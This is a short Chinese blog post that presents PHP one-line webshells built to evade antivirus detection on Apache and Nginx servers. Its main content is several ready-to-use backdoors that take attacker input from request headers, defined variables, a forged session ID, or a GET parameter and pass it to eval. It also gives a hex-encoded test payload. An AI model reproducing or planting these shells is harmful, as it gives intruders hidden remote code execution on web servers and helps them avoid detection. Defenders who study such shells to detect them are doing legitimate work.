当前位置:首页一些小笔记PHP利用Apache、Nginx的特性实现免杀Webshell

PHP利用Apache、Nginx的特性实现免杀Webshell

get_defined_vars()getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell。 

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 返回由所有已定义变量所组成的数组

apache环境

<?php
eval(next(getallheaders())); 
?>
PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>
PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值,进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>
PHP利用Apache、Nginx的特性实现免杀Webshell

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

给TA打赏
共{{data.count}}人
人已打赏
一些小笔记

NGINX编译安装及主机配置分离

2019-2-8 12:50:41

一些小笔记

web容器上传文件利用方式总结

2019-2-14 1:28:40

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索
  • 小七点赞了文章因果超级牛B!
  • 小七点赞了文章提供价值超级牛B!
  • 小七点赞了文章4K中国超级牛B!
  • 小七点赞了文章抖上拼食品精细化无货源完整版实操超级牛B!
  • 小七点赞了文章不要为知识买单,要为行动买单超级牛B!
  • 纯七对文章最新AI suno 歌曲原创赛道玩法分享发布评论!
  • 对文章你好24发布评论!
  • 纯七发布圈子4K中国